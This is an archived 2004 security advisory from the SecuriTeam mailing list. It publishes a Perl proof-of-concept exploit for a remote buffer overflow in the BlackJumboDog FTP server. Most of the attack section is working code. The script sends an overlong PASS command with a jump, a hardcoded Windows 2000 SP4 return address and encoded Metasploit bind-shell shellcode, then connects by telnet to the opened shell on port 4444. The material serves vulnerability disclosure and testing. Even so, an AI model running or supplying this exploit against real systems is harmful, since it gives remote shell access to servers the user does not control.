[EXPL] BlackJumboDog Remote Buffer Overflow Exploit Code

2004-08-06T00:00:00
ID SECURITYVULNS:DOC:6584
Type securityvulns
Reporter Securityvulns
Modified 2004-08-06T00:00:00

Description

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html


BlackJumboDog Remote Buffer Overflow Exploit Code

SUMMARY

A remote buffer overflow was found and reported in our previously featured article ' <http://www.securiteam.com/windowsntfocus/5AP040ADPW.html> BlackJumboDog FTP Server Buffer Overflow'.

The following proof-of-concept script can help test the vulnerability against potentially vulnerable servers.

DETAILS

Exploit:

!/usr/bin/perl

blackJumboDog Exploit code by Tal zeltzer

use strict; use IO::Socket::INET;

usage() unless(@ARGV == 2);

my $host = shift(@ARGV); my $port = shift(@ARGV);

win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444

Size=399 ] http://metasploit.com my $shellcode = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85". "\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19". "\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05". "\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0". "\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74". "\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15". "\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14". "\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53". "\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce". "\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf". "\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb". "\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18". "\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6". "\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16". "\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f". "\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c". "\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18". "\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f". "\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8". "\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e". "\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f". "\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27". "\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2". "\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a". "\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";

my $socket = IO::Socket::INET->new(proto=>'tcp',PeerAddr=>$host,PeerPort=>$port); $socket or die "Cannot connect to host!\n";

print "[+] Connected to host\r\n";

$socket->autoflush(1);

receive banner

my $repcode = "220 "; my $response = recv_reply($socket,$repcode);

send USER command

my $username = "anonymous"; print $socket "USER $username\r\n";

$repcode = "";

select(undef, undef, undef, 1.002); # sleep of 1.2 sec

Send PASS Command ( Evil Buffer )

EIP At 308

7C4E2F60 - jmp ebx On kernel32.dll ( Windows 2000 SP4 )

printf "[+] Sending shellcode\r\n";

my $buf = "A"x308; $buf = $buf . "\xEB\x06\xEB\x06"; # Jump 6 bytes forward $buf = $buf . "\x60\x2F\x4E\x7C"; $buf = $buf . $shellcode; print $socket "PASS $buf\r\n";

select(undef, undef, undef, 1.002); # sleep of 1.2 sec

$repcode = ""; recv_reply($socket, $repcode);

close($socket);

system("telnet $host 4444");

exit(0);

sub usage {

print usage information

print "\nUsage: jumbo.pl <host> <port>\n <host> - The host to connect to <port> - The TCP port\n\n"; exit(1); }

sub recv_reply {

retrieve any reply

my $socket = shift; my $repcode = shift; $socket or die "Can't receive on socket\n";

my $res=""; while(<$socket>) { $res .= $_; if (/$repcode/) { last; } } return $res; }

ADDITIONAL INFORMATION

The information has been provided by Tal Zeltzer of
<mailto:expert@securiteam.com> SecuriTeam Experts.

========================================

This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.